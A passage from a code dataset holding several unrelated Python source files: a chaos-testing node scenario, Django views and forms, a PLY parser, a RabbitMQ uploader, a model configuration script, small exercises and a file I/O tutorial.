self.metric_collector.add_node_stopped_metric(item)\n self.driver.stop(item)\n except:\n self.metric_collector.add_node_stop_failed_metric(item)\n self.logger.exception(\"Error stopping the machine\")\n\n def action_execute(self, item, params):\n \"\"\" Executes arbitrary code on the node.\n \"\"\"\n cmd = params.get(\"cmd\", \"hostname\")\n self.logger.info(\"Action execute '%s' on %r\", cmd, item)\n for value in self.executor.execute(\n cmd, nodes=[item]\n ).values():\n if value[\"ret_code\"] > 0:\n self.logger.info(\"Error return code: %s\", value)\n self.metric_collector.add_execute_failed_metric(item)\n\n def act(self, items):\n \"\"\" Executes all the supported actions on the list of nodes.\n \"\"\"\n self.logger.info(\"Acting on these: %r\", items)\n actions = self.schema.get(\"actions\", [])\n mapping = {\n \"stop\": self.action_stop,\n \"start\": self.action_start,\n \"wait\": self.action_wait,\n \"execute\": self.action_execute,\n }\n return self.act_mapping(items, actions, mapping)\n\n","sub_path":"powerfulseal/policy/node_scenario.py","file_name":"node_scenario.py","file_ext":"py","file_size_in_byte":3390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"526387871","text":"from django.shortcuts import render\nfrom models import Employee\n\n# Create your views here.\n\ndef index(request):\n employee = Employee.objects.create(\n email=\"pedro.kong@company.com\",\n first_name=\"Pedro\",\n last_name=\"Kong\"\n )\n employee.save()\n return render(request, 'core/index.html', {})","sub_path":"views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":320,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"647062660","text":"'''Prefix Averages Algoritm'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef prefix_averages(l):\n\n '''Given a sequence S consisting of n 
numbers, we want to compute a sequence A such\n that A[ j] is the average of elements S[0], . . . , S[ j], for j = 0, . . . , n − 1,'''\n\n num = len(l)\n A = [0] * num\n total = 0\n for i in range(num):\n total += l[i]\n A[i] = total / (i + 1)\n return A\n\nif __name__ == \"__main__\":\n\n # test Prefix Averages\n dd = np.random.randint(1,40, 40)\n plt.plot(prefix_averages(dd))\n plt.plot(dd, c='r')\n plt.legend(['Prefix Ave', 'Initial numbers'])\n plt.title('Prefix Averages')\n plt.show();\n","sub_path":"Prefix_Averages.py","file_name":"Prefix_Averages.py","file_ext":"py","file_size_in_byte":681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"601028800","text":"import ply.yacc as yacc\nimport ply.lex as lex\n\nclass LexerError(Exception): pass\n#List of tokes\ntokens = (\n 'NUM',\n 'OPEN_BRACKET',\n 'CLOSE_BRACKET',\n 'COMMA',\n 'LABEL',\n 'NEWLINE'\n)\n#regular expression rules for simple tokens\nt_OPEN_BRACKET = r'\\['\nt_CLOSE_BRACKET = r'\\]'\nt_COMMA = r'\\,'\n\ndef t_LABEL(t):\n r'([ A-Za-z ]+(_[0-9]+)*)'\n # r'[ a-zA-Z_][a-zA-Z0-9_]*'\n t.value = str(t.value)\n return t\n\ndef t_NUM(t):\n r'[0-9]+(\\.[0-9]+)?'\n t.value = float(t.value)\n return t\n\ndef t_NEWLINE(t):\n r'\\n+'\n t.value = str(t.value)\n t.lexer.lineno += len(t.value)\n return t\n\nt_ignore = ' \\t'\n#error handling rule\ndef t_error(t):\n # print(\"Illegal characters '%s'\" % t.value[0])\n raise LexerError(\"Illegal character '%s'\" % t.value)\n # t.lexer.skip(1)\n\ndef p_start(t):\n ''' start : expression NEWLINE start \n | expression'''\n if len(t) == 2:\n t[0] = [t[1]]\n else:\n t[3].append(t[1])\n t[0] = t[3]\n\ndef p_expression(t):\n '''expression : OPEN_BRACKET seriedata CLOSE_BRACKET'''\n t[2].reverse()\n t[0] = t[2]\n\ndef p_seriedata(t):\n ''' seriedata : OPEN_BRACKET LABEL COMMA LABEL COMMA NUM CLOSE_BRACKET COMMA seriedata \n | OPEN_BRACKET LABEL COMMA LABEL COMMA NUM CLOSE_BRACKET'''\n if len(t) == 8:\n t[0] = [[t[2], t[4], t[6]]]\n else:\n t[9].append([t[2], t[4], t[6]])\n t[0] = t[9]\n\ndef p_error(t):\n raise LexerError(\"Illegal character '%s'\" % t.value)\n # print(\"Syntax error at '%s'\" % t.value)\n\ndef parse(text):\n #Build the lexer\n lexer = lex.lex()\n parser = yacc.yacc()\n if text[-1]=='\\n':\n text=text[:-1]\n result=None\n try:\n result = parser.parse(text)\n except:\n pass\n if result:\n result.reverse()\n return result\n\n# data=''' [[elias,juan,100],[juan,jose ,200],[jose,comio,200]]\n# [[pepe,pedro,100],[pedro,jose ,200],[jose,comio,200]] '''\n# print(parse(data))","sub_path":"api/parsers/grammars/g_str_str_weight_list/g_str_str_weight_list.py","file_name":"g_str_str_weight_list.py","file_ext":"py","file_size_in_byte":1959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"613619100","text":"from uploader import *\r\n# Need to push to Rabbit mq\r\nimport pika\r\n\r\nclass RabbitMQUploader(Uploader):\r\n \r\n def __init__(self, start = 1600, connect = 'iut2-net3.iu.edu', metricName='org.osg.general-perfsonar-simple.conf'):\r\n Uploader.__init__(self, start, connect, metricName)\r\n self.maxMQmessageSize = self.readConfigFile('mq-max-message-size')\r\n self.username = self.readConfigFile('username')\r\n self.password = self.readConfigFile('password')\r\n self.rabbithost = self.readConfigFile('rabbit_host')\r\n self.virtual_host = self.readConfigFile('virtual_host')\r\n self.queue = self.readConfigFile('queue')\r\n self.exchange = self.readConfigFile('exchange')\r\n 
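# this routing key is reused by SendMessagetoMQ() for every basic_publish to the exchange above\r\n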
self.routing_key = self.readConfigFile('routing_key')\r\n try:\r\n credentials = pika.PlainCredentials(self.username, self.password)\r\n parameters = pika.ConnectionParameters(host=self.rabbithost,virtual_host=self.virtual_host,credentials=credentials)\r\n self.connection = pika.BlockingConnection(parameters)\r\n except Exception as e:\r\n self.add2log(\"Unable to create dirq channgel, exception was %s, \" % (e))\r\n\r\n\r\n # Publish summaries to Mq\r\n def publishSToMq(self, arguments, event_types, summaries, summaries_data):\r\n # the max size limit in KB but python expects it in bytes\r\n size_limit = self.maxMQmessageSize * 1000\r\n for event in summaries_data.keys():\r\n if not summaries_data[event]:\r\n continue\r\n msg_head = { 'input-source' : arguments['input_source'],\r\n 'input-destination' : arguments['input_destination'],\r\n 'event-type' : event,\r\n 'rsv-timestamp' : \"%s\" % time.time(),\r\n 'summaries' : 1,\r\n 'destination' : '/topic/perfsonar.summary.' + event }\r\n msg_body = { 'meta': arguments }\r\n msg_body['summaries'] = summaries_data[event]\r\n #msg = Message(body=json.dumps(msg_body), header=msg_head)\r\n self.SendMessagetoMQ(msg_body)\r\n\r\n def SendMessagetoMQ(self, msg_body):\r\n # the max size limit in KB but python expects it in bytes \r\n size_limit = self.maxMQmessageSize * 1000\r\n channel = self.connection.channel()\r\n channel.queue_declare(queue=self.queue,durable=True)\r\n ch_prop = pika.BasicProperties(delivery_mode = 2) #Make message persistent\r\n size_msg = sys.getsizeof(json.dumps(msg_body))\r\n # if size of the message is larger than 10MB discarrd \r\n if size_msg > size_limit:\r\n self.add2log(\"Size of message body bigger than limit, discarding\")\r\n channel.close()\r\n return\r\n # add to mq \r\n try:\r\n result = channel.basic_publish(exchange = self.exchange,\r\n routing_key = self.routing_key,\r\n body = json.dumps(msg_body), \r\n properties = ch_prop)\r\n if not result:\r\n raise Exception('Exception publishing to rabbit MQ', 'Problem publishing to mq')\r\n except Exception as e:\r\n self.add2log(\"ERROR: Failed to send message to mq, exception was %s\" % (e))\r\n channel.close()\r\n\r\n # Publish message to Mq\r\n def publishRToMq(self, arguments, event_types, datapoints):\r\n for event in datapoints.keys():\r\n # filter events for mq (must be subset of the probe's filter)\r\n if event not in self.allowedEvents:\r\n continue\r\n # skip events that have no datapoints \r\n if not datapoints[event]:\r\n continue\r\n # compose msg\r\n msg_head = { 'input-source' : arguments['input_source'],\r\n 'input-destination' : arguments['input_destination'],\r\n 'event-type' : event,\r\n 'rsv-timestamp' : \"%s\" % time.time(),\r\n 'summaries' : 0,\r\n 'destination' : '/topic/perfsonar.raw.' 
+ event}\r\n msg_body = { 'meta': arguments }\r\n msg_body['datapoints'] = datapoints[event]\r\n self.SendMessagetoMQ(msg_body)\r\n \r\n\r\n def postData(self, arguments, event_types, summaries, summaries_data, metadata_key, datapoints):\r\n summary= self.summary\r\n disp = self.debug\r\n lenght_post = -1\r\n for event_type in datapoints.keys():\r\n if len(datapoints[event_type])>lenght_post:\r\n lenght_post = len(datapoints[event_type])\r\n if lenght_post == 0:\r\n self.add2log(\"No new datapoints skipping posting for efficiency\")\r\n return\r\n if summaries_data:\r\n self.add2log(\"posting new summaries\")\r\n self.publishSToMq(arguments, event_types, summaries, summaries_data)\r\n step_size = 100\r\n for step in range(0, lenght_post, step_size):\r\n chunk_datapoints = {}\r\n for event_type in datapoints.keys():\r\n chunk_datapoints[event_type] = {}\r\n if len(datapoints[event_type].keys())>0:\r\n pointsconsider = sorted(datapoints[event_type].keys())[step:step+step_size]\r\n for point in pointsconsider:\r\n chunk_datapoints[event_type][point] = datapoints[event_type][point]\r\n if True:\r\n self.publishRToMq(arguments, event_types, chunk_datapoints)\r\n # Updating the checkpoint files for each host/metric and metadata\r\n for event_type in datapoints.keys():\r\n if len(datapoints[event_type].keys()) > 0:\r\n if event_type not in self.time_starts:\r\n self.time_starts[event_type] = 0\r\n next_time_start = max(datapoints[event_type].keys())+1\r\n if next_time_start > self.time_starts[event_type]:\r\n self.time_starts[event_type] = int(next_time_start)\r\n f = open(self.tmpDir + metadata_key, 'w')\r\n f.write(json.dumps(self.time_starts))\r\n f.close()\r\n self.add2log(\"posting NEW METADATA/DATA to esmondmq %s\" % metadata_key)\r\n \r\n","sub_path":"libexec/probes/worker-scripts/uploader/rabbitmquploader.py","file_name":"rabbitmquploader.py","file_ext":"py","file_size_in_byte":6681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"317027596","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : Mon Dec 24 10:30:29 2018\n# @Author : JRP - Ruipeng Jia\n\nimport argparse, os\nimport torch\n\n\nhome = os.getenv('HOME')\n\n\nclass Config():\n home = home\n\n ## Vocabulary && Sentence\n SENTENCE_START = ''\n SENTENCE_END = ''\n # and are used in the data files to segment the abstracts into sentences. 
They don't receive vocab ids.\n\n # BOS = \"\" # This has a vocab id, which is used at the start of every decoder input sequence\n # EOS = \"\" # This has a vocab id, which is used at the end of untruncated target sequences\n # PAD_TOKEN = \"\" # This has a vocab id, which is used to pad the encoder input, decoder input and target sequence\n # UNKNOWN_TOKEN = \"\" # This has a vocab id, which is used to represent out-of-vocabulary words\n # # Note: none of , , , , , should appear in the vocab file.\n # pad_id = 0 # mask will need pad_idx to be 0\n # unk_id = 1\n # bos_id = 2\n # eos_id = 3\n\n ## Misc\n device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n cov_loss_wt = 1.0\n\n ## Path\n tmp_path = \"./tmp/\" # store all result\n\n\nopt = Config()\nparser = argparse.ArgumentParser(description='JARVIS')\n\n## learning\nparser.add_argument('-lr', type=float, default=0.001, help='initial learning rate [default: 0.0003]')\nparser.add_argument('-epochs', type=int, default=100, help='number of epochs for train [default: 100]')\nparser.add_argument('-optimizer', type=str, default='adam', help='[default: adam]')\nparser.add_argument('-initializer', type=str, default='xavier_uniform_', help='[default: xavier_uniform_]')\nparser.add_argument('-batch_size', type=int, default=8, help='batch size for training [default: 8]')\nparser.add_argument('-bucket_cache_size', type=int, default=1, help='bucket size for training [default: 1]')\nparser.add_argument('-max_grad_norm', type=float, default=2.0, help='max grad norm [default: 2.0]')\nparser.add_argument('-eps', type=float, default=1e-9, help='[default: 1e-9]')\n\n## evaluate\nparser.add_argument('-is_eval', action='store_true', default=False, help='for test to disable dropout and batch_normalization [default: False]')\nparser.add_argument('-log_interval', type=int, default=20, help='how many iters to wait before logging training status [default: 20]')\nparser.add_argument('-test_interval', type=int, default=2000, help='how many iters to wait before testing, shoule be times of log_interval [default: 2000]')\nparser.add_argument('-load_iter', type=int, default=None, help='[default: None]')\nparser.add_argument('-beam_size', type=int, default=5, help='beam size for test [default: 5]')\nparser.add_argument('-test_num', type=int, default=None, help='number of example for test [default: None]')\nparser.add_argument('-train_num', type=int, default=None, help='number of example for train [default: None]')\n\n## limitation\nparser.add_argument('-max_vocab_size', type=int, default=30000, help='vocabulary size of this model [default: 30000]')\nparser.add_argument('-max_iter', type=int, default=None, help='[default: 500000]')\n# for dataset.py to filter the example\nparser.add_argument('-min_source_length', type=int, default=None, help='used to filter original source data [default: None]')\nparser.add_argument('-max_source_length', type=int, default=None, help='used to filter original source data [default: None]')\nparser.add_argument('-min_target_length', type=int, default=None, help='used to filter original target data [default: None]')\nparser.add_argument('-max_target_length', type=int, default=None, help='used to filter original target data [default: None]')\n# for example.py etc. 
to truncate input; just use max_decoder_steps\nparser.add_argument('-min_encoder_steps', type=int, default=0, help='used to cut sentence to shorter length [default: 0]')\nparser.add_argument('-max_encoder_steps', type=int, default=400, help='used to cut sentence to shorter length [default: 400]')\nparser.add_argument('-min_decoder_steps', type=int, default=0, help='[default: 0]')\nparser.add_argument('-max_decoder_steps', type=int, default=100, help='[default: 100]')\n\nparser.add_argument('-max_keep', type=int, default=20, help='[default: 20]')\nparser.add_argument('-textrank_words', type=int, default=None, help='[default: None]')\nparser.add_argument('-textrank_ratio', type=float, default=0.4, help='[default: 0.4]')\n\n## data\nparser.add_argument('-corpus', type=str, default='data_simple', help='corpus to be trained [default: data_simple], alternative: [\"data_simple\", \"gigaword\", \"byte_cup_2018\"]')\nparser.add_argument('-shuffle', action='store_true', default=False, help='shuffle the data every epoch')\n\n## model\nparser.add_argument('-model', type=str, default='RNN', help='model to train')\nparser.add_argument('-layer', type=str, default='GRU', help='model layer to train')\nparser.add_argument('-dropout', type=float, default=0.0, help='the probability for dropout [default: 0.0]')\nparser.add_argument('-weight_decay', type=float, default=0.0, help='L2 [default: 0.0]')\nparser.add_argument('-clip', type=float, default=2.0, help='clip in optimizer [default: 2.0]')\nparser.add_argument('-num_layers', type=int, default=1, help='number of hidden layers [default: 1]')\nparser.add_argument('-kernel_num', type=int, default=100, help='number of each kind of kernel [default: 100]')\nparser.add_argument('-kernel_sizes', type=str, default='3,5,7', help='comma-separated kernel size to use for convolution [default: 3,5,7]')\nparser.add_argument('-freeze', action='store_true', default=False, help='freeze the embedding')\n\n## dimension\nparser.add_argument('-embed_dim', type=int, default=128, help='number of embedding dimension, will auto load Glove vector of that dim [default: 100], alternative: [25, 50, 100, 200]')\nparser.add_argument('-hidden_dim', type=int, default=256, help='number of hidden dimension [default: 512]')\nparser.add_argument('-pos_dim', type=int, default=50, help=\"sentence/word position to a vector\")\nparser.add_argument('-pos_num', type=int, default=40, help=\"sentence number in a document and word number in a sentence\")\nparser.add_argument('-seg_num', type=int, default=10, help=\"realtive sentence position in a document\")\n\n## device\nparser.add_argument('-device_id', type=int, default=1, help='device to use for iterate data, -1 mean cpu [default: 1]')\nparser.add_argument('-no_cuda', action='store_true', default=False, help='disable the gpu')\n\n## extend\nparser.add_argument('-attention_mask', action='store_true', default=False, help='whether to use attention mask [default: False]')\nparser.add_argument('-teacher_forcing', action='store_true', default=False, help='whether to use teacher forcing [default: False]')\nparser.add_argument('-teacher_forcing_ratio', type=float, default=0.5, help='the ratio for teacher forcing [default: 0.5]')\nparser.add_argument('-pointer', action='store_true', default=False, help='whether to use pointer-generator [default: False]')\nparser.add_argument('-coverage', action='store_true', default=False, help='whether to use coverage [default: False]')\nparser.add_argument('-prior_dist', action='store_true', default=False, help='whether to 
use prior distribution [default: False]')\nparser.add_argument('-restrict_hidden', action='store_true', default=False, help='whether to restrict hidden [default: False]')\nparser.add_argument('-multi_head_attention', action='store_true', default=False, help='whether to use Multi-Head Attention [default: False]')\nparser.add_argument('-multi_head_attention_head', type=int, default=8, help='the head number in Multi-Head Attention [default: 8]')\nparser.add_argument('-word_vec', type=str, default=None, help='word vector path [default: None], alternative: [glove_twitter, glove_common, glove_wiki, google_news, sgns_weibo]')\nparser.add_argument('-bert', action='store_true', default=False, help='whether to use BERT [default: False]')\nparser.add_argument('-gpt2', action='store_true', default=False, help='whether to use GPT2 [default: False]')\nparser.add_argument('-orthogonal', action='store_true', default=False, help='whether to orthogonal [default: False]')\nparser.add_argument('-textrank', action='store_true', default=False, help='whether to use textrank [default: False]')\n\n## Misc\n# parser.add_argument('-original_result', action='store_true', default=False, help='for paper result [default: False]')\nparser.add_argument('-dataset_sample_size', type=int, default=100, help='[default: 100]') # generate little dataset from big dataset for running quickly\nparser.add_argument('-log', type=str, default='log', help='path to store log [default: log]')\nparser.add_argument('-contest', action='store_true', default=False, help='whether in contest [default: False]')\n\n\n## Process\n# parser.add_argument('-target_split', action='store_true', default=False, help='[default: False]')\n# parser.add_argument('-source_split', action='store_true', default=False, help='[default: False]')\n\nargs = parser.parse_args()\n\n## word vec\nword_vec_path = {\n None: None,\n 'glove_common_300d': home + '/datasets/WordVec/Glove_Common_Crawl_42B_300D/glove.42B.300d.txt',\n 'glove_twitter_25d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.25d.txt',\n 'glove_twitter_50d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.50d.txt',\n 'glove_twitter_100d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.100d.txt',\n 'glove_twitter_200d': home + '/datasets/WordVec/Glove_Twitter_27B/glove.twitter.27B.200d.txt',\n 'glove_wiki_50d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.50d.txt',\n 'glove_wiki_100d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.100d.txt',\n 'glove_wiki_200d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.200d.txt',\n 'glove_wiki_300d': home + '/datasets/WordVec/Glove_Wikipedia_6B/glove.6B.300d.txt',\n 'google_news_300d': home + '/datasets/WordVec/GoogleNews/GoogleNews-vectors-negative300',\n 'fasttext_wiki-news_300d': home + '/datasets/WordVec/fastText/wiki-news-300d-1M.vec',\n 'sgns_weibo_300d': home + '/datasets/WordVec/sgns.weibo.word'\n}\nargs.word_vec_path = word_vec_path[args.word_vec]\n\nif args.bert:\n # args.embed_dim = 1024 # large\n args.embed_dim = 768 # base\nif args.gpt2:\n args.embed_dim = 768\n\n## path\nargs.corpus_path = opt.tmp_path + args.corpus + '/'\nargs.dataset_file_path = args.corpus_path + 'dataset/'\nargs.vocab_file = args.corpus_path + 'vocab.pkl'\n\nargs.log_path = args.corpus_path + args.log + '/'\nargs.beam_dir = args.log_path + 'beam/'\nargs.save_dir = args.log_path + 'checkpoint/'\nargs.selector_save_dir = args.log_path + 'selector_checkpoint/'\nargs.summary_dir = args.log_path + 
'summary/'\nargs.selector_summary_dir = args.log_path + 'selector_summary/'\nargs.eval_dir = args.log_path + 'eval/'\n\nfor path in [args.dataset_file_path, args.log_path, args.beam_dir, \\\n args.save_dir, args.selector_save_dir, \\\n args.summary_dir, args.selector_summary_dir, \\\n args.eval_dir]:\n if not os.path.exists(path):\n os.makedirs(path)\n\nargs.BOS = \"\"\nargs.EOS = \"\"\nargs.PAD_TOKEN = \"\"\nargs.UNKNOWN_TOKEN = \"\"\nargs.pad_id = 0\nargs.unk_id = 1\nargs.bos_id = 2\nargs.eos_id = 3\n\n\nif args.no_cuda:\n opt.device = torch.device('cpu')\n\nif opt.device == torch.device('cuda'):\n torch.cuda.set_device(args.device_id)\n\nif __name__ == '__main__':\n print(args.BOS) # \n print(opt.device)\n setattr(opt, 'model_name', 'cnn'); print(opt.model_name)\n print(args.dataset_file_path)\n print(args.max_vocab_size)\n print(args.attention_mask)\n print(args.beam_dir)\n print(args.save_dir)\n\n from preview import preview_args\n print(preview_args(args))\n","sub_path":"bin/template/src/jptproject/l5_2018_12_Pytorch_Summarization_with_Pointer-Generator_Networks/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":11763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"414181201","text":"\"\"\"Giving the time slot list to users\"\"\"\ndictionary_name={1:\"9 am\",2:\"11 am\",3:\"12.30pm\",4:\"3pm\",5:\"7pm\",6:\"9pm\"}\nnew_dic={}\n\nclass Meeting:\n \"\"\"A class to do the functions of assigning a time slot\"\"\"\n \n def time_view():\n \"\"\"A function to check if the time slot is available\"\"\"\n \n mine=int(input(\"Enter time slot you want:\"))\n if mine in dictionary_name.keys():\n new_dic.update({mine:dictionary_name[mine]})\n del dictionary_name[mine]\n else:\n print(\"Enter proper time slot\")\n return new_dic\n\n def free():\n \"\"\"A function to return the updated dictionary\"\"\"\n return dictionary_name\n\n \n\ndef main():\n \"\"\"main function to prompt the input from users\"\"\"\n while True:\n print(\"1. Alot 2. 
Remaining Slots 3.exit\")\n a=int(input(\"Enter your choice:\"))\n if a==1:\n x=Meeting.time_view()\n print(\"Allotted slot is :\",x)\n elif a==2:\n y=Meeting.free()\n print(\"Free slots are:\",y)\n else:\n break\n\nmain()\n \n","sub_path":"meeting.py","file_name":"meeting.py","file_ext":"py","file_size_in_byte":1109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"186153828","text":"\"\"\" This module contains classes and functions for Django forms.\n\"\"\"\n\nfrom django import forms\nfrom league import handlers\nimport league.choices as league_choices\nimport league.regions as league_regions\n\nclass StatsQueryForm(forms.Form):\n \"\"\" Form for querying player stats.\n \"\"\"\n\n def __init__(self, handler, *args, **kwargs):\n super(StatsQueryForm, self).__init__(*args, **kwargs)\n self.handler = handler\n\n # set field attributes that require the handler\n years = range(2013, self.handler.league.year + 1)\n teams = sorted(self.handler.TeamModel.objects.all(),\n key=lambda t: t.name)\n self.fields[\"team\"].choices = [('all', 'ALL')] \\\n + [(t.slug,t.name) for t in teams]\n self.fields[\"year\"].choices = [('all', 'ALL')] \\\n + [(i, i) for i in years]\n self.fields[\"gameday\"].choices = [('all', 'ALL')] \\\n + [(i, i) for i in range(40)]\n\n # add form fields\n team = forms.ChoiceField(required=False)\n year = forms.ChoiceField(required=False)\n gameday = forms.ChoiceField(required=False)\n cumulative_stats = forms.BooleanField(required=False)\n\n def _get_teams(self):\n \"\"\" Returns a list of all teams that user requested.\n\n Returns\n -------\n val : QuerySet\n A list of Team models for each team.\n \"\"\"\n val = self.cleaned_data[\"team\"]\n if not val == \"all\":\n return self.handler.TeamModel.objects.filter(slug=val)\n else:\n return self.handler.TeamModel.objects.all()\n\n def _get_years(self):\n \"\"\" Returns a list of all years that user requested.\n\n Returns\n -------\n val : list\n A list of int for each year.\n \"\"\"\n val = self.cleaned_data[\"year\"]\n if not val == \"all\":\n return [val]\n else:\n return [i for i,j in self.fields[\"year\"].choices[1:]]\n\n def _get_gamedays(self):\n \"\"\" Returns a list of all gamedays that user requested.\n\n Returns\n -------\n val : list\n A list of int for each gameday.\n \"\"\"\n val = self.cleaned_data[\"gameday\"]\n if not val == \"all\":\n return [val]\n else:\n return [i for i,j in self.fields[\"gameday\"].choices[1:]]\n\n def _get_cumulative_stats(self):\n \"\"\" Returns a boolean if user requested to get the cumulative stats.\n\n Returns\n -------\n val : bool\n Returns True if user wanted cumulative stats, else False.\n \"\"\"\n return self.cleaned_data[\"cumulative_stats\"]\n\n def get_playerstats(self):\n \"\"\" Returns all the PlayerStat models that user requested.\n\n Returns\n -------\n playerstats : list\n A list of PlayerStat models.\n \"\"\"\n\n # check if form has user data\n if not hasattr(self, \"cleaned_data\"):\n return []\n\n # get user inputs\n teams = self._get_teams()\n years = self._get_years()\n gamedays = self._get_gamedays()\n cumulative_stats = self._get_cumulative_stats()\n\n # set arguments for database query\n kwargs = {}\n if len(years) == 1:\n kwargs[\"game__year\"] = years[0]\n if len(gamedays) == 1:\n kwargs[\"game__gameday\"] = gamedays[0]\n\n # get PlayerStat models\n playerstats = []\n for team in teams:\n for player in team.players.all():\n playerstats += player.playerstats.filter(**kwargs)\n\n return playerstats\n\n
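# --- Editor's usage sketch (not part of the original module): the league slug 'demo-league' and the view function below are illustrative assumptions. ---\ndef _example_stats_view(request):\n \"\"\" Hypothetical view showing how StatsQueryForm is meant to be driven. \"\"\"\n handler = handlers.LeagueHandler('demo-league') # hypothetical slug\n form = StatsQueryForm(handler, request.GET)\n # is_valid() populates cleaned_data, which get_playerstats() checks for\n return form.get_playerstats() if form.is_valid() else []\n\n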
class PipelineStateForm(forms.Form):\n \"\"\" Form for choosing pipeline state.\n \"\"\"\n def __init__(self, team, *args, **kwargs):\n super(PipelineStateForm, self).__init__(*args, **kwargs)\n states = [team.state] + league_regions.states_map[team.state]\n state_names = dict(league_choices.states)\n c = [(state, state_names[state]) for state in states]\n self.fields[\"pipeline_state\"].choices = c\n\n pipeline_state = forms.ChoiceField(required=True,\n choices=league_choices.states)\n\nclass HostCampStateForm(forms.Form):\n \"\"\" Form for choosing host camp state.\n \"\"\"\n\n def __init__(self, team, *args, **kwargs):\n super(HostCampStateForm, self).__init__(*args, **kwargs)\n handler = handlers.LeagueHandler(team.league.slug)\n conference = \"acc\" if team.conference == \"acc-affiliated\" \\\n else team.conference\n conf_teams = handler.TeamModel.objects.filter(\n conference=conference)\n state_names = dict(league_choices.states)\n c = [(conf_team.state, state_names[conf_team.state])\n for conf_team in conf_teams if conf_team.state != team.state]\n self.fields[\"host_camp_state\"].choices = c\n\n host_camp_state = forms.ChoiceField(required=True)\n\n\n\nclass PracticeForm(forms.Form):\n \"\"\" Form for choosing practice options.\n \"\"\"\n offense = forms.ChoiceField(required=True,\n choices=[(\"Syracuse\", \"Syracuse\")])\n defense = forms.ChoiceField(required=True,\n choices=[(\"Pittsburgh\", \"Pittsburgh\")])\n offensive_play = forms.ChoiceField(required=True,\n choices=[(\"rb_dive\", \"rb_dive\")])\n defensive_play = forms.ChoiceField(required=True,\n choices=[(\"threefour_man_mid_blitz\",\n \"threefour_man_mid_blitz\")])\n\n\n","sub_path":"league/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5707,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"478796139","text":"\nfrom config import common\n\nclass Route(object):\n \"\"\" Store each URL-to-handler pair as a tuple appended to a list; the list ends up holding every handler \"\"\"\n\n def __init__(self):\n self.urls = list() # routing table\n\n def __call__(self, url=None, *args, **kwargs):\n def register(cls):\n\n urlnew = \"/{}{}/{}/{}/{}\".format(\n common.get(\"version\", \"v1\"),\n common.get(\"api_base\", \"/api\"),\n str(cls).split('.')[1],\n str(cls).split('.')[2],\n cls.__name__ if not url else url.replace('/',''),\n )\n self.urls.append((urlnew, cls)) # add the URL-to-handler mapping to the routing table\n if kwargs.get(\"id\",None):\n self.urls.append((\"{}/{}\".format(urlnew,\"(.*)\"), cls))\n return cls\n\n return register\n\nroute = Route()\n\n\n\n
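# --- Editor's usage sketch (illustrative; the handler class and its module path are assumptions, not from the original project). ---\n# @route(id=True)\n# class Info(BaseHandler):\n#     ...\n# For a class defined in handlers.user.profile and the defaults version='v1',\n# api_base='/api', this registers '/v1/api/user/profile/Info' and, because\n# id=True, also '/v1/api/user/profile/Info/(.*)'.\n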
","sub_path":"router/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
+{"seq_id":"19751691","text":"#coding=utf-8\n#Text files are what Notepad can open; documents edited in Word are binary files, as are videos and images\n\n# open(<file>,param): param can be r w a b (binary file) or + (read-and-write mode); b and + can each be combined with the other modes, e.g. a+ w+ r+ ...\n#Windows defaults to the GBK encoding; Linux uses utf-8 for files\nf = open('t.txt','a',encoding='GBk') #encoding used when saving\nf.write('测试')\nf.close()\n\n# the with context manager: however you leave the with block, the file is guaranteed to be closed, and execution resumes afterwards\ns = [\"张三\\n\",'李四','王五\\n'] #a list can be written; the \\n characters become line breaks\nwith open('E:\\Pycoding\\log.txt','a') as f:\n f.writelines(s) #write() cannot take a list; writelines() can, but adds no newlines of its own\n\n#read the file a few characters at a time\nwith open('E:\\Pycoding\\log.txt','r') as f:\n print(f.read(4)) #read by character count; with no argument the whole file is read\n#read the file line by line; at end of file an empty string is returned\nwith open('E:\\Pycoding\\log.txt','r') as f:\n while True:\n fragment = f.readline()\n if not fragment:\n break\n else:\n print(fragment,end=' ')\n#read line by line: each line becomes one string in a list, and the list is returned\nwith open('E:\\Pycoding\\log.txt','r') as f:\n print(f.readlines())\n\n#you can also read line by line with an iterator, which yields one line at a time\nwith open('E:\\Pycoding\\log.txt','r') as f:\n for st in f:\n print(st,end=' ')\n\n#some attributes of the file object:\nwith open('log.txt','rb') as f:\n print('file name is: {0}'.format(f.name)) #file name: name\n print(f.tell()) # tell() returns the current position of the file pointer\n print(f.readline())\n print(f.tell())#pointer position after reading one line; tell() counts bytes, and a Chinese character is more than one byte in GBK\n print(f.seek(-10,2)) #this often raises an error: a file not opened in binary mode only supports seeking from the start\n #adding b to the mode makes the other two seek origins usable\n","sub_path":"Pycoding/27_文件.py","file_name":"27_文件.py","file_ext":"py","file_size_in_byte":2056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"}
